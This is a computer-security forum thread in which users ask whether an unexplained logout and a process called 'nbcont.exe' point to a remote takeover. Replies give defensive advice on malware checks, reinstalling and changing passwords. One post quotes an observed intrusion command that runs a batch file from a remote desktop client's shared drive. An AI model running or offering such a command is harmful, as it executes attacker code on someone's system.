When i sat down at my computer a few minutes ago, it had gone back to the login screen even though I did nothing to prompt it to. When i logged back in, I took a screen shot of what was there. I googled "nbcont.exe" nothing came up. I do use Remote desktop but haven't done so today. Was this a takeover attempt?
Computer takeover attempt?
- Thread starter Joe Jones
- Start date
Please provide comments and solutions that are helpful to the author of this topic.
- Oct 2, 2014
- 805
Most users here have remote desktop feature disabled. I can't tell you if it is malicious attempt or not, but it doesn't look good. I can tell you that.
You should ask for malware check on Malware Removal Assistance For Windows
You should ask for malware check on Malware Removal Assistance For Windows
Looks bad IMO.. I'd check to see if you have listening ports. Run a netstat and see what connections are hot.
- Jan 9, 2013
- 1,457
Doesn't look good
Things you can do
Things you can do
- Install System Explorer
- Enable Connections, History and Autoruns tab. Allow it to autostart with Windows
OP isn't going to understand how to use diagnostic tools and check logs himself hence why he's here asking what is going on.
Click here to be redirected to the Malware Removal Assistance area; make sure to read the rules beforehand by clicking here and here.
You can create a thread there and post logs created using a utility instructions are left for using, quick and simple. If the staff member who moderates the area manages to find anything in the logs then he'll definitely help you assuming the rules are stuck to.
Even if nothing is found as long as you have doubts (and certainly if there is a clean-up required), you should re-install Windows at the least, or even go as far as formatting and then re-installing Windows to be on the safer-side. However when doing this, be cautious of backed up data - and remember to always keep a backup for situations like these.
I'd also suggest changing all your passwords and security question answers on a separate, clean device. You can also disconnect the network on the system in-question for the time being until the picture is painted a bit better - this will prevent a communication between any potential malicious code executing on the environment and the attacker (typically via a Command and Control (C&C)/backdoor functionality).
Click here to be redirected to the Malware Removal Assistance area; make sure to read the rules beforehand by clicking here and here.
You can create a thread there and post logs created using a utility instructions are left for using, quick and simple. If the staff member who moderates the area manages to find anything in the logs then he'll definitely help you assuming the rules are stuck to.
Even if nothing is found as long as you have doubts (and certainly if there is a clean-up required), you should re-install Windows at the least, or even go as far as formatting and then re-installing Windows to be on the safer-side. However when doing this, be cautious of backed up data - and remember to always keep a backup for situations like these.
I'd also suggest changing all your passwords and security question answers on a separate, clean device. You can also disconnect the network on the system in-question for the time being until the picture is painted a bit better - this will prevent a communication between any potential malicious code executing on the environment and the attacker (typically via a Command and Control (C&C)/backdoor functionality).
I had the exact same thing happen today. Same situation. Remote desktop into my server and I see this same cmd window with the same commands in it. When I go to the windows Run prompt I see the last command that was executed was "cmd.exe /C \\tsclient\R\a.bat <myPublicIP>.W && exit
Did you ever find out what this is/was?
- Dec 29, 2014
- 1,711
Found this which looks like maybe a.bat could be commonly associated with meterpreter use with hackers:
Hack Like an Elite: Batch Scripting for Malicious Purposes: PART 3 (The Main One) « Null Byte :: WonderHowTo
I wonder if someone has hacked your server? Author seems to be explaining how to harrass others with this technique of using batch files with a.bat, b.bat etc. I love this quote from a comic hacker:
Hack Like an Elite: Batch Scripting for Malicious Purposes: PART 3 (The Main One) « Null Byte :: WonderHowTo
I wonder if someone has hacked your server? Author seems to be explaining how to harrass others with this technique of using batch files with a.bat, b.bat etc. I love this quote from a comic hacker:
Similar threads
